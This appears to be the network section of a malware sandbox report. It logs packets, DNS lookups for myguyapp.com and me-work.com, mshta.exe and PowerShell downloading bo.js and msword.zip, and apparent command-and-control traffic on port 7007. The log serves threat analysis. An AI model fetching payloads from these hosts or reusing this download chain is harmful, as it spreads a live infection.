Dec 11, 2024 18:03:19.418262959 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.418282986 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.418330908 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.418340921 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.418353081 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.418382883 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.424485922 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.424508095 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.424549103 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.424556971 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.424587965 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.424608946 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.429255962 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.429276943 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.429313898 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.429322004 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.429358959 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.429377079 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.435273886 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.435297966 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.435334921 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.435343027 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.435375929 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.435395956 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.441054106 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.441073895 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.441124916 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.441133976 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.441164017 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.441179037 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.446728945 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.446749926 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.446779966 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.446785927 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.446826935 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.452570915 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.452593088 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.452641010 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.452647924 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.452677965 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.452691078 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.456095934 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.606260061 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.606276035 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.606336117 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.606348991 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.606389046 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.611031055 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.611043930 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.611126900 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.611135960 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.611174107 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.615922928 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.615936041 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.615989923 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.615998983 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.616048098 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.621752977 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.621764898 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.621809959 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.621819973 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.621862888 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.627557993 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.627571106 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.627654076 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.627664089 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.627701998 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.633507967 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.633523941 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.633582115 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.633591890 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.633637905 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.639075994 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.639096022 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.639162064 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.639177084 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.639211893 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.644443989 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.644458055 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.644525051 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.644531965 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.644582033 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.647403955 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.797142982 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.797162056 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.797223091 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.797239065 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.797281027 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.802501917 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.802516937 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.802568913 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.802577019 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.802615881 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.808549881 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.808566093 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.808600903 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.808608055 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.808650017 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.808650970 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.814353943 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.814368963 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.814414024 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.814428091 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.814445972 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.814466953 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.819546938 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.819561958 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.819597960 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.819605112 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.819639921 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.819658995 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.825510025 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.825524092 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.825604916 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.825604916 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.825619936 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.825660944 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.831108093 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.831121922 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.831155062 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.831161022 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.831177950 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.831207037 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.837171078 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.837186098 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.837254047 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.837261915 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.837304115 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.989636898 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.989656925 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.989743948 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.989758968 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.989801884 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.994950056 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.994965076 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.995018005 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:19.995028973 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:19.995080948 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.000907898 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.000924110 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.000972033 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.000982046 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.001013041 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.001032114 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.006663084 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.006676912 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.006736040 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.006745100 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.006784916 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.011902094 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.011917114 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.011959076 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.011967897 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.012002945 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.017889977 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.017904043 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.017961979 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.017971039 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.018023968 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.018444061 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.023489952 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.023509026 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.023561954 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.023571014 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.023605108 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.024976015 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.029227018 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.029239893 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.029297113 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.029305935 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.029351950 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.041197062 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.182200909 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.182219028 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.182285070 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.182307959 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.182353020 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.187728882 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.187743902 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.187809944 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.187828064 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.187875986 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.194010019 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.194025040 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.194077969 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.194086075 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.194123983 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.199382067 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.199397087 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.199441910 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.199450970 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.199510098 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.204971075 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.204987049 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.205033064 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.205040932 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.205076933 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.211821079 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.211836100 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.211893082 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.211900949 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.211963892 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.217143059 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.217158079 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.217216015 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.217223883 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.217251062 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.217267036 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.221132994 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.221147060 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.221379042 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.221396923 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.221524954 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.225131989 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.376296997 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.376318932 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.376385927 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.376403093 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.376427889 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.376740932 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.380980968 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.380992889 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.381112099 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.381123066 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.381182909 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.386957884 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.386970997 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.387062073 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.387070894 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.387207031 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.392816067 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.392829895 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.392908096 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.392918110 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.393091917 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.396107912 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.396155119 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.396186113 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.396230936 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.396239042 CET	443	49735	193.26.115.21	192.168.2.4
Dec 11, 2024 18:03:20.396284103 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.436693907 CET	49735	443	192.168.2.4	193.26.115.21
Dec 11, 2024 18:03:20.566548109 CET	49734	80	192.168.2.4	193.26.115.21
Dec 11, 2024 18:06:08.179388046 CET	50021	7007	192.168.2.4	193.26.115.21
Dec 11, 2024 18:06:08.298930883 CET	7007	50021	193.26.115.21	192.168.2.4
Dec 11, 2024 18:06:08.299140930 CET	50021	7007	192.168.2.4	193.26.115.21
Dec 11, 2024 18:06:08.362551928 CET	50021	7007	192.168.2.4	193.26.115.21
Dec 11, 2024 18:06:08.483283043 CET	7007	50021	193.26.115.21	192.168.2.4
Dec 11, 2024 18:06:22.039016008 CET	50021	7007	192.168.2.4	193.26.115.21
Dec 11, 2024 18:06:22.159600973 CET	7007	50021	193.26.115.21	192.168.2.4
Dec 11, 2024 18:06:34.138983965 CET	7007	50021	193.26.115.21	192.168.2.4
Dec 11, 2024 18:06:34.180430889 CET	50021	7007	192.168.2.4	193.26.115.21
Dec 11, 2024 18:06:35.665153027 CET	50021	7007	192.168.2.4	193.26.115.21
Dec 11, 2024 18:06:35.784782887 CET	7007	50021	193.26.115.21	192.168.2.4
Dec 11, 2024 18:06:49.321317911 CET	50021	7007	192.168.2.4	193.26.115.21
Dec 11, 2024 18:06:49.440843105 CET	7007	50021	193.26.115.21	192.168.2.4
Dec 11, 2024 18:07:02.977423906 CET	50021	7007	192.168.2.4	193.26.115.21
Dec 11, 2024 18:07:03.096910000 CET	7007	50021	193.26.115.21	192.168.2.4
Dec 11, 2024 18:07:04.142054081 CET	7007	50021	193.26.115.21	192.168.2.4
Dec 11, 2024 18:07:04.195772886 CET	50021	7007	192.168.2.4	193.26.115.21

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 18:03:02.441751957 CET	51618	53	192.168.2.4	1.1.1.1
Dec 11, 2024 18:03:02.779273033 CET	53	51618	1.1.1.1	192.168.2.4
Dec 11, 2024 18:03:22.958487034 CET	56732	53	192.168.2.4	1.1.1.1
Dec 11, 2024 18:03:54.677440882 CET	55859	53	192.168.2.4	1.1.1.1
Dec 11, 2024 18:03:54.902585983 CET	53	55859	1.1.1.1	192.168.2.4
Dec 11, 2024 18:06:07.861500025 CET	65467	53	192.168.2.4	1.1.1.1
Dec 11, 2024 18:06:08.175275087 CET	53	65467	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 11, 2024 18:03:02.441751957 CET	192.168.2.4	1.1.1.1	0xb151	Standard query (0)	myguyapp.com	A (IP address)	IN (0x0001)	false
Dec 11, 2024 18:03:22.958487034 CET	192.168.2.4	1.1.1.1	0x4b9a	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 11, 2024 18:03:54.677440882 CET	192.168.2.4	1.1.1.1	0xeb2e	Standard query (0)	dwLscOsEZmpbOxr.dwLscOsEZmpbOxr	A (IP address)	IN (0x0001)	false
Dec 11, 2024 18:06:07.861500025 CET	192.168.2.4	1.1.1.1	0x1d1f	Standard query (0)	me-work.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 11, 2024 18:03:02.779273033 CET	1.1.1.1	192.168.2.4	0xb151	No error (0)	myguyapp.com		193.26.115.21	A (IP address)	IN (0x0001)	false
Dec 11, 2024 18:03:23.190396070 CET	1.1.1.1	192.168.2.4	0x4b9a	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 11, 2024 18:03:54.902585983 CET	1.1.1.1	192.168.2.4	0xeb2e	Name error (3)	dwLscOsEZmpbOxr.dwLscOsEZmpbOxr	none	none	A (IP address)	IN (0x0001)	false
Dec 11, 2024 18:06:08.175275087 CET	1.1.1.1	192.168.2.4	0x1d1f	No error (0)	me-work.com		193.26.115.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

myguyapp.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	193.26.115.21	80	7764	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 18:03:11.871068001 CET	167	OUT	GET /msword.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
Dec 11, 2024 18:03:12.611454010 CET	597	IN	HTTP/1.1 302 Found Date: Wed, 11 Dec 2024 17:03:12 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Location: https://myguyapp.com/msword.zip Content-Length: 317 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 6d 79 67 75 79 61 70 70 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://myguyapp.com/msword.zip">here</a>.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at myguyapp.com Port 80</address></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	193.26.115.21	443	7232	C:\Windows\SysWOW64\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 17:03:04 UTC	301	OUT	GET /bo.js HTTP/1.1 Accept: / Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: myguyapp.com Connection: Keep-Alive
2024-12-11 17:03:04 UTC	312	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 17:03:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 11 Dec 2024 14:16:33 GMT ETag: "ceb-628ff3eb20535" Accept-Ranges: bytes Content-Length: 3307 Content-Disposition: attachment Connection: close Content-Type: text/javascript
